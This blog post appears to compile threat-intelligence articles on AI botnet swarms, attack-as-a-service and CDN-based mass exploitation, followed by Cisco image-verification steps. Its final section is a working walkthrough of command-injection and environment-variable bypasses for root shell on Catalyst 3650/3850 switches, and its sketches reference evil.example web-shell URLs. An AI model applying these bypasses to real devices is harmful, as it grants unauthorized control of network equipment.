Friday, November 30, 2018

AI and CDN used in Network Exploitation & Attacks (Pt.3)

Working together toward a common goal – attacking networks – that is the task of an intelligent botnet: able to share information on vulnerabilities and hosts, and to quickly change strategy without a bot herder.

[https://threatpost.com/newsmaker-interview-derek-manky-on-self-organizing-botnet-swarms/136936/]

For over five years Derek Manky, global security strategist at Fortinet and FortiGuard Labs, has been helping the private and public sector identify and fight cybercrime. His job also includes working with noted groups: Computer Emergency Response Teams (CERTs), the NATO NICP, the INTERPOL Expert Working Group and the Cyber Threat Alliance.
Recently Threatpost caught up with Manky to discuss the latest developments around his research on botnet “swarm intelligence.” That’s a technique where criminals enlist artificial intelligence (AI) inside botnet nodes. Those nodes are then programmed to work toward a common goal of bolstering an attack chain and accelerating the time it takes to breach an organization.


Threatpost: What are “self-organized botnet swarms?”
Manky: What we are starting to see [are] humans, such as the black-hat hackers, being taken out of the attack cycle more and more. Why? Because humans are slow by nature compared to machines.
Swarms accelerate the attack chain – or attack cycle. They help attackers move fast. Over time, as defenses improve, the window of time for an attack is shrinking. This is a way for attackers to make up for that lost time.
A self-learning swarm is a cluster of compromised devices that leverage peer-based AI to target vulnerable systems. Traditional botnets wait for commands from a bot herder. Swarms are able to make decisions independently. They can identify and assault – or swarm – different attack vectors all at once.
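The difference from a herder-driven botnet can be sketched as a toy simulation. Everything here – the node names, the tiny "network", the gossip scheme – is illustrative, not taken from any real malware: each node probes on its own and gossips findings to its peers, so no central command channel is needed.

```python
class SwarmNode:
    """Toy peer-based node: findings spread node-to-node, no bot herder."""
    def __init__(self, name):
        self.name = name
        self.peers = []            # other SwarmNode objects
        self.known_targets = set()

    def scan(self, network):
        """Independently probe the simulated network for weak hosts."""
        found = {host for host, weak in network.items() if weak}
        self.known_targets |= found
        self.gossip(found)

    def gossip(self, findings):
        """Share findings with peers instead of reporting to a C2 server."""
        for peer in self.peers:
            peer.known_targets |= findings

# Simulated network: host -> "has a known weakness"
network = {"printer": True, "nas": False, "camera": True}

a, b = SwarmNode("a"), SwarmNode("b")
a.peers, b.peers = [b], [a]
a.scan(network)                 # only node "a" scans...
print(sorted(b.known_targets))  # ['camera', 'printer'] - "b" learns via gossip
```

The point of the sketch is the absence of any central object issuing commands: remove node "a" and "b" still holds the shared target list.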

TP: What type of botnets are we talking about here? Botnets used for crippling a network? Where is this technology seen today?
Manky: Hide and Seek is a recent botnet that we have seen with the swarm technology in it.

TP: So, what makes Hide and Seek unique?
Manky: Typically a botnet will receive a command from the attacker, right? They go DDoS the target or try to exfiltrate information. But what we are starting to see with these new peer-to-peer botnets is they are able to share those commands – between botnet nodes – and act on their own without an attacker issuing any commands.

TP:  Is this machine intelligence? And, what is it that these botnets are trying to learn from and execute?
Manky: They are collecting data. They are trying to learn information about potential attack targets – that is, exploits and weaknesses that they can launch a successful attack against. They are trying to pinpoint vulnerabilities or holes that they can actually go and launch a successful exploit against. They are looking for a penetration weakness – something they can send payload to. Once they find it, the node can let the rest of the botnet nodes know.

TP: Can you break this down into a likely scenario?
Manky: We’re starting to see this in the world of IoT. A hypothetical situation includes a network where there is a barrier – a network firewall, or policies. On the network are a printer, network-attached storage, an IP security camera and a database. Then, for whatever reason, the IP security camera is on the same network segment as the database. Now [the attack] can target the printer and infect the network-attached storage, which infects the camera. Now the camera can be used as a proxy to gather intelligence.
That intelligence is shared between the nodes. It’s a structured command list where it can say “send me a list of targets that you know, have this within the network segment – along with intelligence on that segment.” And then – when the network configurations match – the nodes can swarm and request the exfiltration of data and launch more attacks.

TP: Is there anything that is unique about the size or agility of these botnets? Does this “intelligence” allow it to be more efficient and smaller?
Manky: Swarms are large by nature. But I would call them first, efficient. Traditional botnets are monolithic. Bot-herders typically rent a botnet out just to [launch] a DDoS attack or just to launch a phishing attack. But with swarms, they have the capability to spin up resources – similar to virtual machines.
Bot-herders can say, “I want 20 percent of this botnet doing DDoS. I want 30 percent doing phishing campaigns.” It’s more about monetization, efficiency and being fast.

TP: When you say “swarms,” can you give me a sense of what you exactly mean by that?
Manky: The best example is what we see in nature – such as birds, bees and ants. When ants communicate they use pheromones between each other. The pheromones mark the shortest path to bring back food to the nest. Ants, in this scenario, aren’t taking orders from the queen ant. They are acting on their own.
Now the same concept is being applied to botnet code. What we are seeing are precursors of this right now. Hide and Seek has the code, but isn’t using it yet.
Hide and Seek is a decentralized IoT botnet. The capabilities are in the code, but we are still waiting for the first full-blown attack using this technique.
I expect to see a lot more of this technology in 2019.
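The ant-pheromone analogy above maps onto a simple reinforcement loop. Here is a deterministic "expected pheromone" sketch of that mechanism – all numbers are illustrative and this is not any real botnet's algorithm: paths that pay off get their trail strengthened, trails evaporate over time, and choices concentrate on the cheapest path with no central coordinator.

```python
# Two candidate paths with equal initial "pheromone" trail strength
pheromone = {"short_path": 1.0, "long_path": 1.0}
cost = {"short_path": 2.0, "long_path": 5.0}   # shorter route = cheaper

for _ in range(100):
    total = sum(pheromone.values())
    for path in pheromone:
        share = pheromone[path] / total            # picked in proportion to trail
        pheromone[path] += share * (1.0 / cost[path])  # reinforce cheap successes
        pheromone[path] *= 0.99                    # all trails evaporate slightly

# The short path accumulates the stronger trail, with no queen/herder involved
print(pheromone["short_path"] > pheromone["long_path"])  # True
```

Because reinforcement is inversely proportional to cost, the short path's relative growth always exceeds the long path's, so the swarm converges on it.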

TP:  Where does that leave us on the defense side of the equation?
Manky: It really needs to redefine the network security center. We are going to need more automated tools. It’s going to come down to AI versus AI. We need better security postures that are capable of actually detecting and acting on their own as well.
If you are up against a swarm, it is very fast by nature. It can breach a target before a human administrator can even detect it. For that reason, the network intelligence needs to be able to understand what it is seeing and act on it.
At a higher level, it comes down to quality of intelligence and how much you trust your intelligence sources.

CDN and AI in Network Exploitation (Pt.2)

[https://threatpost.com/how-shared-pools-of-cloud-computing-power-are-changing-the-way-attackers-operate/138108/]

In many ways this migration to the cloud mirrors that of legitimate businesses.

It is much less financially advantageous for attackers to maintain large botnets, along with the knowledge and expertise needed to avoid detection and grow the bot. The fact that it is much easier to pay somebody else to maintain these things and simply rent time should sound very familiar to anybody who uses a cloud service application like Salesforce or Oracle. The advantages for the attackers are very similar to those gained by a legitimate business. Attackers can offer chunks of their botnet or attack infrastructure for sale, gaining more money – usually in bitcoin – by segmenting the bot and selling time on it individually.

DDoS-as-a-service has been around for quite some time and was probably the first foray into the attack-as-a-service model. DDoS-as-a-service was very successful because it removes the necessity for maintaining a large botnet from the attackers themselves. Bot herders could focus instead on growing their botnet and modifying the malware that they used in order to exploit new systems rather than worrying about how much an individual attack was going to impact the botnet as a whole.
From there it was a very short jump to segmenting the bot and allowing multiple customers to use chunks of it as they needed, rather than throwing the full weight of the bot at a given target. Many of these services operate under the aegis of a "stresser service" that ostensibly lets website owners make sure their sites work under load. However, this was merely a fig leaf for the real purpose: allowing anybody with bitcoin or a credit card to purchase time on a bot and direct attack traffic at a website of their choosing.

The success of this model drove other types of attacks to migrate to the service model. Ransomware-as-a-service became a very profitable endeavor. Ransomware authors sell turnkey solutions to anybody who has money, providing secure communications and, in some cases, even technical support for the victims.

Today, we see a large number of different attacks-as-a-service, which makes it very easy for low-sophistication attackers to use highly sophisticated tools and techniques. Skilled malware authors can develop very advanced techniques that would normally be out of reach of low-sophistication attackers and, rather than worrying about being targeted by law enforcement, can simply sell a subscription or a turnkey solution.
This evolution creates new challenges for defenders.

In the past, it was easy for researchers and security teams with some experience to identify hosting providers known to originate attacks and put them on a network blacklist. This was an easy way to blunt a large number of attacks. However, as attackers move to cloud services, the sheer number of different tenants on those services makes it difficult or impossible to block the IP ranges, so the chance of an attack getting past a network blacklist increases dramatically.
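The blacklisting approach, and why shared cloud ranges break it, can be illustrated with a minimal check. The CIDR range here is a reserved documentation block, purely illustrative:

```python
import ipaddress

# Illustrative blocklist entry (203.0.113.0/24 is a documentation range)
blocklist = [ipaddress.ip_network("203.0.113.0/24")]

def is_blocked(ip):
    """Classic network-blacklist check: drop anything in a bad range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in blocklist)

print(is_blocked("203.0.113.7"))   # True
print(is_blocked("198.51.100.9"))  # False
# With dedicated "attack hosting" this coarse blocking was cheap and safe.
# On a shared cloud range the same prefix serves many unrelated tenants,
# so blocking it punishes legitimate traffic and stops being viable.
```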

Additionally, this type of business makes it possible for low-sophistication attackers – or attackers with no knowledge at all – to wield very complicated attack tools against targets simply by paying for a license key.

New technologies are constantly reshaping the business landscape, but business leaders also must consider how these can enable new attacks – or make old mitigations obsolete.

CDN and AI use in Network Exploitation (Pt.1)

[https://threatpost.com/the-nature-of-mass-exploitation-campaigns/139428/]

In this article we’ll talk about the tactics and procedures observed by Akamai researchers and security teams as they work through the operational response to a mass exploitation campaign. "Mass exploitation" describes the process in which attackers launch an attack campaign at large scale, using CDN services or mass-mailing services to reach more victims in less time.
The idea starts with an attacker who has a well-formed payload or exploit, which they need to use at scale in a relatively short period of time.
A common example is a zero-day vulnerability that is posted to an underground forum and purchased by an attacker. As that code starts to get used in the wild, there is a finite amount of time before research teams and incident response teams notice the attack and try to mitigate it. Also, vendor timelines for issuing a patch can vary. This varied timeline of the exploit being “exploitable” is what drives mass exploitation.
There are three main categories of problems relating to the identification of mass exploitation attempts:
Category One (False Positives): Identifying mass exploitation among the noise in your environment can be daunting. For instance, if you are trying to filter on Remote File Inclusion (RFI) attempts and executed payloads, there is a tremendous amount of noise from security vendors running application scans against your environment looking for risks. One common example is an RFI test from WhiteHat Security: if the system being scanned is vulnerable, it will download the test script and execute it, a process that will be monitored and added to the list of things you need to fix for that system.
Example RFI Exploit Code from WhiteHat Security
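Separating vendor-scan noise from real RFI attempts often comes down to an allow-list of known test sources. A hedged sketch with made-up log lines – the scanner domain "whsec.example" is an assumed allow-list entry, not WhiteHat's real infrastructure:

```python
import re

# Hypothetical access-log lines
logs = [
    "GET /page.php?file=https://whsec.example/rfi-test.txt",  # vendor scan
    "GET /page.php?file=https://evil.example/shell.txt",      # real RFI try
    "GET /index.html",                                        # normal traffic
]

RFI = re.compile(r"[?&]file=(https?://\S+)")
KNOWN_SCANNERS = ("whsec.example",)   # assumed allow-list of test sources

def is_scanner(url):
    """True when the included URL belongs to a known scanning vendor."""
    return any(domain in url for domain in KNOWN_SCANNERS)

suspicious = [
    line for line in logs
    if (m := RFI.search(line)) and not is_scanner(m.group(1))
]
print(suspicious)  # only the evil.example inclusion remains
```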

Category Two: Further complicating the identification of attack campaigns is purposeful obfuscation by attackers, who use techniques such as fast-flux domains and sites like Google or GitHub to reference content that usually doesn't raise much attention unless you know what you're looking for.

Example 1: raw.githubusercontent.com
By hosting web shells on GitHub, the attacker doesn't need to manage multiple copies of the files, and there is little chance that site/URL-reputation services will blacklist the GitHub domain. Here the attacker is calling a PHP shell and using GitHub's CDN to get caching and accelerated delivery of that shell to the target system.
  

Example 2: googleusercontent.com
Attackers have taken advantage of other types of cloud services to distribute their attack traffic as well – one of which is Google Apps Script. By creating scripts in Google Sheets that contain scripted commands, an attacker can make requests look like they're coming from a "trusted" location such as Google. Without context, this may go unnoticed, or at least make it harder to tell good requests from bad, given where the requests originate.

An example: a small website hit with a scripted but distributed GitFlood, driving usage costs up over 1,000%.

This goes unnoticed until you start to see the volumes of traffic that can be generated from this infrastructure, or until the requests take advantage of an application vulnerability to perform mass exploitation.

Category Three: The third category is "timely" threat-intelligence challenges and large-scale visibility challenges. If Blue Teams can only see threat info on traffic that reaches their own environment, it's challenging to spot larger-scale trends or patterns efficiently.
We frequently see malicious actors upload their malware/exploit code to more than one third-party website or CDN in an attempt to re-use it, usually for redundancy purposes or if security devices add the URL to a blacklist.
When tracking samples, we identified that they were being accessed by more than one originating IP/ASN which tells us that attackers are proxying through IPs/ASNs when attempting large scale RFI attacks. This technique usually indicates the use of Fast Flux domains.
Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies. Fast-flux usage is becoming common for two reasons:

  1. Compromised hosts storing exploit code are being discovered quickly and taken offline before the attackers can make use of them.
  2. Because attackers are launching exploits at many systems as part of large-scale exploitation attempts, they require payloads to be highly available. For this reason, we are seeing an increase in the use of low-cost CDNs to deploy and host exploit code.
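One way to spot fast-flux-style payload hosting is to count how many distinct origin ASNs serve the same sample. A sketch over made-up observations – the URLs, ASN numbers, and threshold are all illustrative:

```python
from collections import defaultdict

# Hypothetical sensor data: (payload URL, origin ASN) pairs
observations = [
    ("http://cdn.example/shell.txt", 64500),
    ("http://cdn.example/shell.txt", 64501),
    ("http://cdn.example/shell.txt", 64502),
    ("http://static.example/logo.png", 64499),
]

asns = defaultdict(set)
for url, asn in observations:
    asns[url].add(asn)

# A payload served from many ASNs in a short window hints at fast flux
FLUX_THRESHOLD = 3
flagged = [url for url, seen in asns.items() if len(seen) >= FLUX_THRESHOLD]
print(flagged)  # the shell URL is flagged, the static asset is not
```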
There are other examples of how attackers win by using mass exploitation campaigns, but to increase the success rate of defending against the above techniques, Blue Teams must focus on three distinct areas:
Interstitial inspection: Using reverse proxies or some form of interstitial device/process to perform inspection and validation of requests prior to sending traffic to back end application servers.
Large scale data / threat correlation: The more data you have about an inbound request (application workflow wise) or IP address via threat intelligence sources, the better. The main thing to focus on here is that you have as much info as possible which usually involves a threat feed and data sharing relationships with partners.
Layered defenses: It’s highly valuable to have both perimeter and forward-facing defenses as well as defenses inside or behind the firewall to watch for malicious activity inside the corporate network as well as requests going out to the internet.
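The interstitial-inspection idea above can be sketched as a toy request validator placed in front of the application servers. The RFI pattern check is illustrative only; a real reverse proxy inspects far more than this:

```python
from urllib.parse import urlparse, parse_qs

def inspect(request_url):
    """Toy interstitial check: reject requests whose query parameters embed
    a remote URL (a classic RFI pattern) before proxying to the back end."""
    params = parse_qs(urlparse(request_url).query)
    for values in params.values():
        for value in values:
            if value.startswith(("http://", "https://", "ftp://")):
                return "blocked"
    return "forwarded"

print(inspect("/view?page=about"))                          # forwarded
print(inspect("/view?page=http://evil.example/shell.txt"))  # blocked
```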






IOS image verification - running + saved

Verify the authenticity and integrity of the binary file by using the show software authenticity file command. In the following example, taken from a Cisco 1900 Series Router, the command is used to verify the authenticity of c1900-universalk9-mz.SPA.152-4.M2.bin on the system:
Router# show software authenticity file c1900-universalk9-mz.SPA.152-4.M2

File Name                     : c1900-universalk9-mz.SPA.152-4.M2
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
In addition, administrators can use the show software authenticity running command to verify the authenticity of the image that is currently booted and in use on the device. Administrators should verify that the Certificate Serial Number value matches the value obtained by using the show software authenticity file on the binary file. The following example shows the output of show software authenticity running on a Cisco 1900 Series Router running the c1900-universalk9-mz.SPA.152-4.M2 image.
Router# show software authenticity running
 
SYSTEM IMAGE
------------
Image type                    : Production
    Signer Information
        Common Name           : CiscoSystems
        Organization Unit     : C1900
        Organization Name     : CiscoSystems
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
    Signature Algorithm       : 2048-bit RSA
    Key Version               : A
    Verifier Information
        Verifier Name         : ROMMON 1
        Verifier Version      : System Bootstrap, Version 15.0(1r)M9, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
This example also shows that the Certificate Serial Number value, 509AC949, matches the one obtained with the previous example.
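The serial-number comparison described above is easy to script. A hedged sketch that parses trimmed `show software authenticity` excerpts (the sample text is abbreviated from the outputs above; field parsing is a simple regex, not a Cisco API):

```python
import re

# Trimmed excerpts of the two command outputs shown above
file_output = """
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
"""
running_output = """
    Certificate Serial Number : 509AC949
    Hash Algorithm            : SHA512
"""

def cert_serial(output):
    """Pull the Certificate Serial Number field out of CLI output."""
    m = re.search(r"Certificate Serial Number\s*:\s*(\S+)", output)
    return m.group(1) if m else None

# The on-disk image and the running image should carry the same serial
print(cert_serial(file_output) == cert_serial(running_output))  # True
```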

Cisco IOS-XE - Request Platform System Shell

Verifying Authenticity for Digitally Signed Images


Older Catalyst 3650 & 3850 switches vulnerability:
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]

Workaround:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]

No input validation ==> just use backticks
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: SecureShell [debug]Key verification failed
Switch#
  
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
  
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
[/code]

Netcat found ...
[code]
bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
[/code]

What can be done with it? Pretty much whatever you want – for example, cross-compiling and running your own MIPS binaries:
[code]

[EXTRA]    Building a toolchain for:                 
[EXTRA]      build  = x86_64-unknown-linux-gnu
[EXTRA]      host   = x86_64-unknown-linux-gnu
[EXTRA]      target = mips-unknown-elf           

bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped

[/code]

When you request a shell, the following happens:

a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response') (the same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads 2k from /dev/mtdblock6 via libcodesign_pd.so + libflash.so, signs the challenge, compares it to the response and returns 0 if it is valid, nonzero otherwise
c) so anything like ||/bin/true will work just fine

shell_wrapper skips verification entirely if DISABLE_SHELL_AUTHENTICATION=1 is set in the environment
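Step (c) works because this is a textbook shell-injection flaw: the user-supplied response is pasted, unquoted, into a system() command line. A Python illustration of the same pattern – POSIX shell assumed, and `false` stands in for the real signature check, which rejects any bogus response:

```python
import subprocess

def verify(challenge, response):
    """Mimics the flawed pattern: untrusted input is interpolated straight
    into a shell command. 'false' stands in for the failing signature check."""
    cmd = f"false {challenge} {response}"   # no quoting, no validation
    return subprocess.call(cmd, shell=True) == 0

print(verify("deadbeef", "bogus"))         # False: the check fails normally
print(verify("deadbeef", "|| /bin/true"))  # True: '||' hijacks the exit status
```

The injected `||` makes the shell discard the failing check's status and substitute a command that always succeeds, exactly like `||/bin/true` in the response prompt.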

The RSA public key on mtdblock6 can be changed, so you can generate a valid response if you hold the corresponding private key.
[code]
you can escape the IOS filesystem jail (/mnt/sd3/user) with ../../ so copy foo ../../etc would copy foo to /etc
[/code]
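The `../../` trick works because the user path is joined to the jail root and normalized without checking that the result stays inside it. A minimal illustration with hypothetical POSIX paths:

```python
import os

JAIL = "/mnt/sd3/user"   # the IOS filesystem jail root

def resolve(user_path):
    """Naive join + normalize, as a jail-unaware wrapper might do."""
    return os.path.normpath(os.path.join(JAIL, user_path))

print(resolve("foo"))        # /mnt/sd3/user/foo -> inside the jail
print(resolve("../../etc"))  # /mnt/etc          -> outside the jail

def is_inside_jail(user_path):
    """The defensive check that is evidently missing here."""
    return resolve(user_path).startswith(JAIL + os.sep)

print(is_inside_jail("../../etc"))  # False
```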